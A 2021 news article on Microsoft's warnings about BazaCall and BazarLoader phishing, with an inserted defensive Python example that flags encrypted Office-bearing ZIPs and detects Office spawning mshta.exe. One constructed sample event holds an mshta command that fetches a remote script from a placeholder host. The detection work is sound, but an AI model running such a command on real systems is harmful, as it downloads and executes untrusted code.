Microsoft ramps up warnings about an apparent low-tech attacker that’s adopting more sophisticated techniques.
By | August 12, 2021 — 12:04 GMT (13:04 BST) | Topic: Security
Microsoft’s Security Intelligence team is once again raising an alarm about the call center phishing and malware group behind what it calls BazaCall. 
«We are tracking multiple active email campaigns that use BazarLoader to deliver a wide range of payloads. These campaigns appear disparate but share a common trait: their tactics attempt to challenge conventional email security solutions and best practices,» Microsoft said in a tweet.
The ‘Stolen Images’ BazarLoader campaign uses fake copyright-infringement complaints submitted through website contact forms, paired with malicious files that purport to contain the «stolen images», to trick users into downloading the malware.
Another technique is to trick potential victims into opening emails from what they think are trusted sources.
«A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader,» Microsoft said.
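The thread-hijacking chain Microsoft describes gives a defender two concrete handles: the attachment is a password-protected ZIP (which a mail gateway can list but cannot open), and the macro hands off to mshta.exe, a signed Windows binary that Word has no reason to launch. The following is an added example, not code from the article, Microsoft or any vendor product. It reads ZIP entry flags straight from the archive metadata and runs a parent/child process rule over constructed Sysmon-style process-creation records; the field names (ParentImage, Image, CommandLine, Computer), the sample archive and the sample events are all constructed here, and the URL is a placeholder.

```python
import io
import struct
import zipfile

# Handle 1: password-protected ZIP attachments carrying an Office document.
# Bit 0 of an entry's general-purpose flag marks it as encrypted; a mail gateway
# that cannot open the archive cannot scan the document inside, but it can still
# read member names and flags from the central directory.
OFFICE_EXTS = (".doc", ".docm", ".dot", ".dotm", ".xls", ".xlsm")


def inspect_zip_attachment(data: bytes) -> dict:
    """Report encrypted and Office members of a ZIP without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    encrypted = [i.filename for i in infos if i.flag_bits & 0x1]
    office = [i.filename for i in infos if i.filename.lower().endswith(OFFICE_EXTS)]
    return {
        "encrypted_members": encrypted,
        "office_members": office,
        # The combination this campaign relies on: an Office file the gateway cannot open.
        "suspicious": bool(encrypted) and bool(office),
    }


def build_sample_zip(member: str, encrypted: bool) -> bytes:
    """Constructed test archive (not a real attachment). The stdlib cannot write
    encrypted ZIPs, so for the encrypted case the encryption bit is set by hand in
    both the local and the central-directory header; only the metadata matters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(member, b"placeholder content, not a real document")
    data = bytearray(buf.getvalue())
    if encrypted:
        local = data.find(b"PK\x03\x04")      # local file header signature
        central = data.find(b"PK\x01\x02")    # central directory entry signature
        struct.pack_into("<H", data, local + 6, 0x0001)    # flags sit at offset 6
        struct.pack_into("<H", data, central + 8, 0x0001)  # flags sit at offset 8
    return bytes(data)


# Handle 2: an Office process spawning mshta.exe.
# The parent/child pair is the high-signal part of the chain; the download URL
# in the command line changes per campaign, the pairing does not.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SUSPECT_CHILDREN = {"mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_office_to_mshta(events) -> list:
    """Return one hit per process-creation record whose parent is an Office
    binary and whose child is mshta.exe (assumed Sysmon event ID 1 field names)."""
    hits = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent in OFFICE_PARENTS and child in SUSPECT_CHILDREN:
            hits.append({"host": ev.get("Computer"), "parent": parent,
                         "cmdline": ev.get("CommandLine", "")})
    return hits


# Constructed records, not real telemetry. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"Computer": "WS01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/stage.hta"},
    {"Computer": "WS01",  # a user opening an .hta from Explorer: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\victim\help.hta"},
    {"Computer": "WS02",  # Word spawning a legitimate print helper: not flagged
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for name, enc in (("invoice.docm", True), ("invoice.docm", False)):
        print(name, "encrypted" if enc else "plain", inspect_zip_attachment(build_sample_zip(name, enc)))
    for hit in detect_office_to_mshta(SAMPLE_EVENTS):
        print("ALERT", hit)
```

The ZIP check deliberately stops at the central directory: the password is in the email body, so the gateway cannot open the document anyway, and an encrypted archive whose only member is an Office file is itself the signal worth quarantining or at least tagging. The process rule is the endpoint-side backstop for the case where the user supplies the password and enables the macro; it fires on the parent/child pair regardless of what the macro downloads.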
Microsoft first raised an alarm about BazaCall in June because of its unusual and relatively expensive techniques, which relied on phishing emails with claims about expired trial subscriptions and impending payments. 
The emails stand out because they don’t include links to web pages: instead, the emails encourage potential targets to contact a call center at which point the operator provides instructions to install malware under the guise of helping to cancel the fake payment. 
The installed backdoor allows BazaCall actors to install ransomware, including but not limited to Ryuk and Conti. 
Its tactics are notable because the emails contain neither phishing links nor malicious attachments, which helps them evade traditional email filters and detection systems.
The first point of contact is a call center operator who discusses the expiring subscription detailed in the email. The operator then recommends the victim visit a website where they can supposedly cancel the subscription to avoid future monthly fees.
«BazarLoader is a first-stage malware that allows remote attackers to gain control over an affected device, exfiltrate data, and install ransomware payloads – notably Conti. The multi-component and evasive nature of these attacks requires comprehensive protection,» Microsoft notes. 
In a GitHub post, Microsoft notes that the group also uses copyright claims as a lure.
BazaCall is not a new threat: security firm FireEye raised an alarm about BazarLoader in December, and before that Trend Micro spotted a campaign spreading the BazarLoader backdoor and Ryuk ransomware.